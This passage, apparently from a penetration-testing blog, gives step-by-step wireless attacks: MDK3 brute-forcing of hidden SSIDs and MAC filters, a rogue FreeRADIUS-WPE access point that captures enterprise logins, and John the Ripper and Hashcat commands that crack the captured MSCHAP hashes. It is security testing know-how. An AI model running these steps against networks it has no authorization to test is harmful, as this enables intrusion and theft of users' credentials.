Got response from 00:3B:10:47:33:32, SSID: "wow"
I began with a dictionary against a network address i got from my initial airodump-ng. On my first MDK3 run i found one new access point named "wow" but i didnt find the target AP's SSID. If you look at the above MDK3 output there are 2 other networks with similar formats which may reflect our target networks format. Below you will see a similar format.
- Guest_Access
- Secure_Access
If the target company has a repeating SSID format we can create our own dictionary file. According to the above output the format is [Word]_Access, we can take advantage of this by creating a new list with python using the company format. Break open your python editor and create a quick script to parse the english dictionary in the proper format for our attack by uppercasing every dictionary word and appending the word "Access".
#--------------------------------------------------------------
#!/usr/bin/python
dictionary = open("rockyou-75.txt", "r")
SSID_List = open("SSID_List.txt", "a")
for word in dictionary:
word = str.capitalize(word) + "Access"
SSID_List.write(word)
SSID_List.close()
dictionary.close()
#----------------------------------------------------------------
I then ran MDK3 again with my modified list. When this was done I then was able to get a response from MDK3 and determine the SSID of the target network, shown below.
Got response from 00:01:55:B1:A3:A5, SSID: "Secret_Access"
Luckily i didn't have to resort to a true bruteforce attack although the format is shown above for completeness.
MDK3 MAC address Bruteforce:
The next issue is that of determining a valid MAC address on a network without any known clients, this can also be done with MDK3 and bruteforce mode. I would suggest looking at other client MAC addresses on the guest or corporate networks as a starting point. Then use those vendor startpoints as your bruteforce values. So if for example you know a bit about the company based on other network MAC values you can use this knowledge in your brute forcing with the -f switch. Below is a basic command ouput for bruteforcing MAC address filters.
ficti0n:# mdk3 mon0 f -t
Trying MAC 00:00:22:00:00:00 with 100.0000 ms timeout at 0 MACs per second and 0 retries
Trying MAC 00:00:22:00:00:00 with 100.0000 ms timeout at 0 MACs per second and 1 retries
Packets sent: 2 - Speed: 1 packets/sec
Found a valid MAC adress: 00:00:22:00:00:00
Have a nice day! :)
Mdk3 -fullhelp output:
--------------------------------------------------------------
MAC filter bruteforce mode
This test uses a list of known client MAC Adresses and tries to
authenticate them to the given AP while dynamically changing
its response timeout for best performance. It currently works only
on APs who deny an open authentication request properly
-t
Target BSSID
-m
Set the MAC adress range to use (3 bytes, i.e. 00:12:34)
Without -m, the internal database will be used
-f
Set the MAC adress to begin bruteforcing with
(Note: You can't use -f and -m at the same time)
---------------------------------------------------------------------
I wasn't aware of the above technique at the time of testing but i did give it a try on a local Access Point and found a useable mac address under contrived scenarios. So this was worth noting as I found almost zero mention of it when searching around. Also note that some access points do not properly handle the authentication scenarios in which case the above technique will not work correctly. Usually the user sends an auth request and then the AP sends an auth response denoting success or failure along with an error code, but MAC filering is not part of the normal standard so results will vary regarding error codes. This is AP functionality independent. When it does work it gives you a little smily face and says it found a useable MAC address [SHOWN ABOVE] . Unfortunately in my penetration test I was stuck waiting for a client to come online to get a useable MAC address. Below are a few ideas for the rest of the scenario.
Depending on the location and use of the limited connectivity device there are a few options available for retrieving the WEP key. Networks with hidden SSID's have clients who are always probing for hidden networks whether onsite or remote. You could attack a client directly via a Cafe Latte attack. A Caffe Latte attack woud attack a client with a fake access point and gratuitas ARP requests to discover the WEP key of "Secret_Access" by flooding the client with ARP requests it responds to, generating enough traffic to derive the WEP key. This technique is useful now that you know the SSID, especially if the device is being used at the local coffee shop. I will take a look at this attack in the next blog when focusing on client based attacks.
Caffe Latte was not a good option for me because the device appears online for a short period of time and might not be available either offsite at a coffee shop or even locally long enough to generate enough traffic to crack the network. In this test I however didn't have enough time to see client actually get online but had I see the client get online I would have noted his MAC address and then configured a chop chop or fragmentation attack against the network whether the client was available or not all i would really need is one data packet. I will not illustrate this whole technique as it is fully covered in the following link Cracking WEP with no Clients.
Cracking Radius /PEAP/TTLS Hashes: (Post EAP Attack)
This is about attacking hashes from WPE Radius attacks, but just as a reference before we start here is a quick radius attack setup guide without going into to much detail.
Steps to Setup WPE attack
- Install the following freeradius server and WPE patch. http://blog.opensecurityresearch.com/2011/09/freeradius-wpe-updated.html
- Start your WPE server by typing 'radiusd'
- Tail your log file so you can see incoming credentials 'tail -f /usr/local/var/log/radius/freeradius-server-wpe.log
- Setup an access point with similar settings as to what you are seeing in airodump or wireshark essentially this will be a WPA Enterprise with AES and a default secret of 'test' which is set in the WPE installed package by default so it can talk between the AP and the radius server. You will also need to run an ifconfig on your radius server box so you know what address to point the AP too.
- Optionally you can use hostAP instead of a physical enterprise AP setup.
Use one of your local computers to connect to the FreeRadius wireless network and type in a fake username/password to grab an example hash. If you dont see your hash output in the logfile then double check all your ip addresses and insure your server is running. In a real attack you would wait for clients to attach to your Access point and the credentials will be forwarded to your FreeRadius-WPE server. Once this is done the fun begins and also where we will start in our attack scenario.
Formatting hashes:
Your hashes can come in a few formats, they might come back as PAP responses in which case they will be plain text passwords. Plaintext PAP can sometimes be a result of mobile devices sending paswords. Otherwise your attack will result in MSChap password challenge/response hashes. Once you receive your MSChap hashes they have to be formated in a specific way in order to crack them. Here is an example hash and the proper format to use before trying to crack the hashes.
Example Hash:
mschap: Mon Feb 05 19:35:59 2012
username: test
challenge: b3:f8:48:e9:db:02:22:83
response: 15:36:d7:e9:da:43:1f:5f:d2:4b:51:53:87:89:63:b7:12:26:7c:a8:f7:ea:9c:26
Formated for john:(username::::response:challenge)
test::::1536d7e9da431f5fd24b5153878963b712267ca8f7ea9c26:b3f848e9db022283
Tool to automate this: (Tool Link)
One of my friends wrote a python script that will take your freeradius-server-wpe.log as input and format out all of the hashes one per line.. The script output can be fed directly into John The Ripper(JTR).
JTR Cracking and Custom Rulesets:
One way to crack these hashes is to use JTR with a bunch of dictionary attacks and if that fails procede from there with custom korelogic rulesets. Check out preceding link for more info on password cracking techniques which can be employed in addition to this blog. Below I will reiterate a few points on setting up JTR with custom rulesets from the Defcon challenge in 2010 based on the previous link and then how to parse them out and use them.
The first thing to note is that the format of the hashes you get from WPE will generally be considered NETNTLM within JTR so we will have to specify that as well as the wordlists we would like to use to start.
Dictionary attacking first:
First go into your JTR directory and try to crack with some dictionaries of your choosing:
ficti0n:# cd Desktop/Tools\ /john/run
ficti0n:# ./john --wordlist=wordlists/wpa.txt --format=NETNTLM JohnFormat.txt
Loaded 1 password hash (NTLMv1 C/R MD4 DES [netntlm])
test (test)
guesses: 1 time: 0:00:00:00 100.00% (ETA: Tue Mar 20 19:29:31 2012) c/s: 692441 trying: test
Custom Rules: korelogic rulesets (Link)
If the cracking fails on all of your wordlists then try installing custom rulesets with the following sequence of commands meant do download and then append the rules to the current john file. The following command can also be found at the above Korelogic link.
ficti0n:# wget http://contest-2010.korelogic.com/rules.txt
ficti0n:# cat rules.txt >> john.conf
Once this is done you can directly specify any rule in the file similar to the following:
ficti0n:# ./john --wordlist=wordlists/english.txt --format=NETNTLM --rules:KoreLogicRulesAppendNum_AddSpecialEverywhere johnFormat.txt
Or if you are time independent just let them all rip and go on vacation and check the results when you get back LOL
ficti0n:# for ruleset in `grep KoreLogicRules john.conf | cut -d: -f 2 | cut -d\] -f 1`; do ./john --wordlist=wordlists/english.txt --format=NETNTLM --rules:${ruleset} JohnFormat.txt; done
Hashcat rulesets and building pasword files:
Another way to build complex password files is to use tools like HashCat with supplied password rules and pipe it out to STDOut, either into a file or the STDIn of other cracking programs like John the Ripper. There is a rules folder in HashCat which has a number of rules provided by default.
Available Hashcat Rules:
ficti0n:# ls
best64.rule generated.rule passwordspro.rule T0XlC.rule toggles3.rule
combinator.rule leetspeak.rule perfect.rule toggles1.rule toggles4.rule
d3ad0ne.rule oscommerce.rule specific.rule toggles2.rule toggles5.rule
Creating Passwords with Hashcat and a dictionary:
ficti0n:# ./hashcat-cli32.bin -r rules/passwordspro.rule ../wordlists/cain.txt --stdout
You can also pipe passwords directly into JTR from hashcat output but its really slow so I suggest you make a world list then load it up with --wordlist, but the example is shown below.
Piping Hashcat password rules into JTR: (really slow)
ficti0n:# ./hashcat-cli32.bin -r rules/passwordspro.rule ../wordlists/rockyou-75.txt --stdout |/pentest/passwords/john/john --format=NETNTLM JohnFormat.txt --stdin
I hope someone finds my above notes useful, I am going to write up some client side attack stuff as well and post it up here... Let me know if you have any questions or need more clarification on anything covered in the blogs.
Continue reading
Subscribe to:
Posts (Atom)
